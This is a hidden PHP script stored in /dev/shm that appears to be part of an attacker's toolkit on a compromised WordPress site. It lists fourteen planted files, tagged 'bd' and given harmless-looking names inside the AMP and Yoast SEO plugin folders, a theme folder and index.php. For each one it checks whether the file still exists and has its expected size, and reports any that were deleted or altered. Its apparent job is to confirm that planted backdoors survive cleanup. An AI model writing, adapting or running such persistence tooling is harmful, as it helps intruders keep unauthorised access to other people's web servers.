File: //dev/shm/.record
<?php $r = '/home/tjwrkjywub/ayang77.org'; $x = ["/wp-content/plugins/amp/vendor/fasterimage/fasterimage/src/FasterImage/tpl.inc.php"=>"bd@@850962@@1074",
"/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-factory/src/address_book.php"=>"bd@@858398@@1066",
"/wp-content/plugins/wordpress-seo/src/ai/consent/infrastructure/endpoints/consent.endpoint.interface.php"=>"bd@@850735@@810",
"/wp-content/plugins/wordpress-seo/src/plans/infrastructure/add-ons/managed.add.on.php"=>"bd@@858441@@968",
"/wp-content/themes/archives-1782222887/includes/settings/error.404.1782222887.php"=>"bd@@647248@@867",
"/index.php"=>"bd@@808026@@405",
"/wp-content/plugins/wordpress-seo/src/ai-free-sparks/infrastructure/endpoints/free.sparks.endpoint.php"=>"bd@@858493@@954",
"/wp-content/plugins/wordpress-seo/src/editors/framework/seo/posts/title.post.provider.php"=>"bd@@850825@@1002",
"/wp-content/plugins/wordpress-seo/src/dashboard/domain/score-groups/readability-score-groups/no.readability.score.group.php"=>"bd@@669606@@968",
"/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/OptionProvider/class.category.php"=>"bd@@659134@@901",
"/wp-content/plugins/amp/vendor/sabberworm/php-css-parser/src/Value/logoff.php"=>"bd@@850897@@956",
"/wp-content/plugins/amp/vendor/ampproject/amp-toolbox/src/Optimizer/Transformer/group_buy.php"=>"bd@@858337@@941",
"/wp-content/plugins/wordpress-seo/src/ai/generator/infrastructure/endpoints/get.subscription.interface.php"=>"bd@@850658@@857",
"/wp-content/plugins/amp/vendor/sabberworm/php-css-parser/src/RuleSet/blank.php"=>"bd@@858362@@982"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');